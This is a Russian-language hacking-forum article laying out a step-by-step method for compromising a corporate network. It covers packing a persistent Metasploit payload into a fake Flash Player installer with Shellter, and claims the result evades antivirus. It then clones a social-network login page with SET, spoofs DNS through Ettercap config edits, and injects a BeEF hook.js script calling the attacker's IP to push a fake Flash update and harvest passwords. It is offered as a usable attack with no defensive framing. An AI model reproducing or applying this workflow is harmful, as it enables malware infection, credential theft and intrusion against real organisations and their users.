Тотальное заражение сети
Life-Hack
Здравствуйте, на сей раз хочу поделится с вами личным (свинским) методом заражения (корпоративной сети)
Вынашивал сей метод долго... продумывал каждый шаг и поэтому статья не будет короткой как обычно.
Из неё Мы вспомним старые, добрые инструменты такие как Beef-xss framework, Ettercap, SET,shellter ну и классика MSF или не раз мной и здесь упомянутый другими обитателями этого замечательного борда EMPIRE.
Возможно прочитав её Вы почерпнете для себя что то новое, а именно не знакомые функции в старых добрых инструментов.
Важным плюсом моей методики является то что Вам не придется что-то впаривать жертве подсовывать и т.д. при хорошем раскладе она сама все сделает!)))
Предположим что Вы инсайдер или прорвали первую линию обороны взломав вражескую беспроводную сеть и Вас мучают вопросы как быть дальше, ответы есть и не только в этой статье, а например такие как eternalblue и т.д. но что делать если чужие машины уже про патчены и експлойты их не пробивают!? Ответ прост, читаем дальше..
Итак начнем с создания и маскировки нашего малваря, а именно это будет флэш-плеер от всем известной компании сами знаете какой. Показывать я буду на примере MSF а то Вы наверняка уже думаете " че он пристал к этому EMPIRE как лишай да пионерки"
вот скрины его создания с дополнительной функцией persistence
Далее смешиваем его с flashplayer -ом в shellter
в итоге получаем зараженный ФП на вирусы сканил, на момент написания статьи он чист !
Далее подымаем сервис апач и заводим утилиту SET с её помощью клонируем популярный сайт соц. сети или-же сайт который пользуется спросом в корпоративной (вражеской) сети! На этом моменте заострять внимание я думаю не стоит инфы полно везде.. попутно телепортируем наш зараженный ФП в паку сервиса апач.
Настройка сети под себя:
Идем в папку: cd /etc/ettercap/ там лежат файлы конфигурированния (настройки) этой утилиты, а именно нас интересует два файла etter.conf и etter.dns открываем в nano | leafpad файл etter.conf
ставим значение "0"
сохраняем и закрываем его.
Открываем второй файл etter.dns
3-ю строчку можно удалить, сохраняем и закрываем.
Запускаем: ettercap -G
Запусти его по позже !!! У нас остался еще один важный инструмент BEEF-XSS . Итак поясняю что мы сделали, как только жертвы будут заходить с сети на наш фэйк-сайт который мы прописали в настройках они будут автоматом попадать к нам!))) Следовательно мы не только заразим машину но еще бонусом получим логин пароль от аккаунтов!)) Лично меня такая аттака устраивает на все 100! Едем дальше...
НАСТРОЙКА BEEF:
Идем в папку: cd /usr/share/beef-xss/modules/social_engineering/fake_flash_update
там есть файл config.yaml под строчкой fake_flash_update: вписываем: autorun: true
Cледуещее что нам нужно сделать это вписать строчку в код файла который мы создали в SET-e и находится он в сервисе апач /var/www/html/ вот эта строчка <script src="http://ВашIP:3000/hook.js"></script> Запускаем BEEF он выдаст инфу как попасть в панель управления>
http://127.0.0.1:3000/ui/panel логин: "beef" пароль такой же!
Там находим соц.инж / fake flash update настраиваем под себя текст, время появления окна о том что "вы не можете попасть на страницу т.к. ваш ФП устарел" и прописываем путь до Вашего ФП чтобы жертва могла его скачать опять же у нас!))
Запуск:
apache2>SET>Ettercap>BEEF>MSF>
ждем сессий в метасплойте/империи и логинов паролей в СЭТ-е!
ПРИВЕТ! , Нубам для Вас здесь есть над чем подумать!)
и ХРЮ-ХРЮ-ХРЯ-ХРЮ.......хрю.........хру.......хру